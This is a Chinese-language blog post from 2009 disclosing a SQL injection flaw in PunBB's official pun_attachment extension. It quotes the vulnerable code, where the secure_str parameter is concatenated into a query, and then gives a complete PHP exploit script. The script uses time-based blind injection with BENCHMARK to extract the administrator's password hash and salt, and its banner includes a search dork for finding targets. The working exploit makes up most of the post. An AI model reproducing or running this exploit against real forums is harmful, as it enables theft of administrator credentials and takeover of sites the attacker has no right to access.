PunBB官方上传附件扩展注射漏洞

by Ryat
2009-10-24

本来想给论坛加个上传附件的功能,从官方网站下了个pun_attachment,顺便看了下代码,结果发现了这个漏洞:p

if (isset($_GET['secure_str']))
{
    if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
    {
    ...
            'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1) AND secure_str = \''.$_GET['secure_str'].'\''

挺明显的,应该是对正则表达式及preg_match函数的误用,导致可以通过$_GET[‘secure_str’]来触发sql inj…

另外,在pun_list_attach.php文件还有个注射,不过需要后台权限,有兴趣的同学自己看,那个要更明显些:)

最后给个PoC性质的EXP,具体效果和利用方式就别问我了…

#!/usr/bin/php
<?php

print_r('
+---------------------------------------------------------------------------+
Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PunBB"
+---------------------------------------------------------------------------+
');
/**
 * works regardless of php.ini settings
 */
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to punbb
Example:
php '.$argv[0].' localhost /punbb/
+---------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];

$pre = 'pun_';

$benchmark = 200000000;
$timeout = 10;

echo "Plz Waiting...\nPassword:\n";
/**
 * get pass
 */
$j = 1;
$pass = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(48, 57)); //numbers
$hash = array_merge($hash, range(97, 122)); //a-z letters

while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $pass .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("\nExploit Failed!\n");
    }
    $j ++;
}

echo "\nSalt:\n";
/**
 * get salt
 */
$j = 1;
$salt = '';

$hash[0] = 0; //null
$hash = array_merge($hash, range(33, 126));

while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i ++) {
        if (in_array($i, $hash)) {
            $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
            send();
            usleep(2000000);
            $starttime = time();
            send();
            $endtime = time();
            $difftime = $endtime - $starttime;
            if ($difftime > $timeout) {
                $salt .= chr($i);
                echo chr($i);
                break;
            }
        }
        if ($i == 255)
            exit("\nExploit Failed!\n");
    }
    $j ++;
}

exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");

function send()
{
    global $host, $path, $cmd;

    $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>

相关日志

发表评论